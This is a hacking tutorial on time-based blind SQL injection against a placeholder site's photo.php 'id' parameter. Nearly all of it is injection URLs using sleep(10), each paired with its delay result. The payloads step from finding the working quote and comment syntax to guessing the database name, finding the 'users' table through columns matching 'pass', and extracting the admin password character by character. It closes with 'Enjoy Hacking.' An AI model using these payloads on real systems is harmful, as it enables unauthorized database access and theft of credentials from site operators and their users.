⏳Time based Blind Injection

The way of exploitation will be same as blind injection just the injection is little changed. so as in blind we were getting to know that the question we asked the database returns true or not by the page loaded. But this time we will know that by the delay in loading the page.

-------------------------------------------------------------

The scenario of Time based Blind is when there is no change in page but it is actually vulnerable okay so lets start from testing of this injection:

www.vuln-web.com/photo.php?id=1" and sleep(10)--
No delay

www.vuln-web.com/photo.php?id=1" and sleep(10)#
No delay

www.vuln-web.com/photo.php?id=1" and sleep(10)/*
No delay

www.vuln-web.com/photo.php?id=1" and sleep(10)--+
No delay

www.vuln-web.com/photo.php?id=1" and sleep(10)--+-
No delay

www.vuln-web.com/photo.php?id=1 and sleep(10)--
No delay

www.vuln-web.com/photo.php?id=1 and sleep(10)#
No delay

www.vuln-web.com/photo.php?id=1 and sleep(10)/*
No delay

www.vuln-web.com/photo.php?id=1 and sleep(10)--+
No delay

www.vuln-web.com/photo.php?id=1 and sleep(10)--+-
No delay

www.vuln-web.com/photo.php?id=1' and sleep(10)--
No Delay

www.vuln-web.com/photo.php?id=1' and sleep(10)#
Delay in page loading

www.vuln-web.com/photo.php?id=1' and sleep(10)/*
No delay

www.vuln-web.com/photo.php?id=1' and sleep(10)--+
No delay

www.vuln-web.com/photo.php?id=1' and sleep(10)--+-
No delay

So as now we know the right closing syntax and comment where we actually got the delay. we can continue our injection with that. While using # as comment type always remember to URL encode # to %23

-------------------------------------------------------------

Getting the Database Name:

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() like '%')#

Let us First check The Number of characters in current Database Name.

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() like '_____')# (we started from 5)
No delay

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() like '______')# (Now we chaecked 6)
No Delay

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() like '_______')# (Now we checked 7)
Delay


##### So now we know it have 7 characters. Now lets check the common characters a,e,i,o,u,s,t,r,h



www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() like '%a%')#
Delay

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() like '%e%')#
Delay

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() like '%i%')#
No Delay

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() like '%o%')#
No Delay

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() like '%u%')#
No Delay
And so on.

##### After collecting this information let us assume we got a,e,d,b,s,_,1
Its the database so we can make a guess it makes the word 'dbase_1'

##### to make sure we are correct we can check it out


www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() = 'dbase_1')#
Delay

##### We got the Database name now lets target tables containing any column name which contains the string "pass".


www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%')#

We searched for the first table name which contains columns like pass. If the Query returns true that means there is some output. So now we can start guessing out the name after Couting the number of Characters.


www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '____')#
No Delay

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '_____')#
Delay

So we got 5 characters. Now we can start geussing the characters.


www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%a%')#
We checked A

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%s%')#
We checked S

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%d%')#
We Checked D

Let us assume we got e,s,r,u after getting this we can quickly the the last will be again s which will make 'users'. Let us try


www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like 'users')#
True

okay it worked now we will try to get the columns in the same way i will just give the example query. and u can use the same method to get the data. You can even try for common names. 


www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where (select column_name from information_schema.columns where table_schema=database() and table_name='users' and column_name like '%username%' limit 0,1) like '%')#

if they return true then you dont have to waste your time in guessing characters.


##### in the end the last query to get the admin password we can use:


www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where (select password from users wehre username like '%admin%' limit 0,1) like '%')#

Rest you can now start guessing the password characters one by one.

Enjoy Hacking.    
        

-------------------------------------------------------------